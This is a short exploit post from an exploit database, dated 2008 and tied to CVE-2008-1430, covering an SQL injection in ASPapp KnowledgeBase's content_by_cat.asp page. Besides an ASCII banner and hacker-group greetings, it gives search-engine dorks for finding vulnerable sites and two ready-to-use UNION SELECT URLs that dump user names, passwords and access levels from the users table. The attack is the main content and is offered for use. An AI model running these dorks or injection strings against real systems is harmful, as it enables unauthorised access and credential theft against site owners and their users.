ASPapp Knowledge Base - SQL Injection



EKU-ID: 13229 CVE: OSVDB-43843;CVE-2008-1430 OSVDB-ID:
Author: xcorpitx Published: 2008-03-20 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


..##.....##
...##...##
....##.##
.....###CoRPITX
.....###
....##.##
...##...##
..##.....##

-------------------------Turkey------------------------------

-----------------www.Hayalet-hack.com------------------------

-----------------www.xcorpitx-hack.com-----------------------

ASPapp KnowledgeBase (content_by_cat.asp?catid) SQL Injection Vulnerability
-------------------------------------------------------------

-------
Dork 1 -  content_by_cat.asp?contentid ''catid''

Dork 2 -  content_by_cat.asp? ''catid''
-------
exploit-
-------

-------------------------------------------------------------
content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
-------------------------------------------------------------

-------------------------------------------------------------
content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
-------------------------------------------------------------

thanx- str0ke-D3ng3siz-pc faresi-s@bun-Hayalet-Turque-

# milw0rm.com [2008-03-20]